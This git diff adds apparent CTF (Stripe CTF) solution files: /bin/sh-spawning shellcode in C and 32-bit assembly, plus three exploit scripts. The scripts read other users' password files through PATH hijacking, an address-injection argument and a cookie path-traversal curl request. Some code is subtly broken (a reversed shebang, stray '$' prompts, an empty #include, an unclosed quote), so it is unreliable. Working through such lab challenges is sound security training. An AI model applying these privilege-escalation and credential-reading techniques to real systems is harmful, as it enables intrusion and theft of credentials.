diff --git a/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/Makefile b/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/Makefile new file mode 100644 index 0000000..65d1333 --- /dev/null +++ b/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/Makefile @@ -0,0 +1,2 @@ +shell: simplest_shellcode.c + gcc -static -g -o shell simplest_shellcode.c diff --git a/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/how_to_compile_asm_32.md b/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/how_to_compile_asm_32.md new file mode 100644 index 0000000..dbd5e37 --- /dev/null +++ b/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/how_to_compile_asm_32.md @@ -0,0 +1,5 @@ +as --32 -o s.o s.s +ld -m elf_i386 -o s s.o +./s +objdump -d s + diff --git a/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/simplest_shellcode.c b/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/simplest_shellcode.c new file mode 100644 index 0000000..af8d7a0 --- /dev/null +++ b/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/simplest_shellcode.c @@ -0,0 +1,9 @@ +#include +int main() +{ + char *array[2]; + array[0] = "/bin/sh"; + array[1] = NULL; + execve(array[0], array, NULL); + exit(0); +} diff --git a/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/simplest_shellcode_32.s b/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/simplest_shellcode_32.s new file mode 100644 index 0000000..8a97918 --- /dev/null +++ b/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/simplest_shellcode_32.s @@ -0,0 +1,16 @@ +.code32 +.text +.globl _start + +_start: + xorl %eax, %eax /* We need to push a null terminated string to the stack */ + pushl %eax /* So first, push a null */ + pushl $0x68732f2f /* Push //sh */ + pushl $0x6e69622f /* push /bin */ + movl %esp, %ebx /* Store the %esp of /bin/sh into %ebx */ + pushl %eax /* Since eax is still null, let's use it again */ + pushl %ebx /* Now we can writ the /bin/sh again for **argv */ + movl %esp, %ecx /* Write argv into %ecx */ + xorl %edx, %edx /* NULL out edx */ + movb $0xb, %al /* Write syscall 11 into %al */ + int $0x80 /* Interrupt the system */ diff --git a/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_1.sh b/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_1.sh new file mode 100644 index 0000000..1d5ab08 --- /dev/null +++ b/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_1.sh @@ -0,0 +1,6 @@ +!#/bin/sh +cd /tmp +echo '/bin/cat /home/level01/.password > date' +chmod +x date +export PATH=$PWD +/levels/level01/level01 \ No newline at end of file diff --git a/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_2.sh b/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_2.sh new file mode 100644 index 0000000..9450d99 --- /dev/null +++ b/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_2.sh @@ -0,0 +1,2 @@ +!#/bin/sh +$ /levels/level03 -20 "cat /home/level03/.password $(printf '\xac\x84\x04\x08') \ No newline at end of file diff --git a/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_3.sh b/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_3.sh new file mode 100644 index 0000000..5a3f9e1 --- /dev/null +++ b/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_3.sh @@ -0,0 +1,2 @@ +#!/bin/sh +$ curl --user level01:$(cat /home/level01/.password) --digest -b "user_details=../../home/level02/.password" localhost:8002/level02.php \ No newline at end of file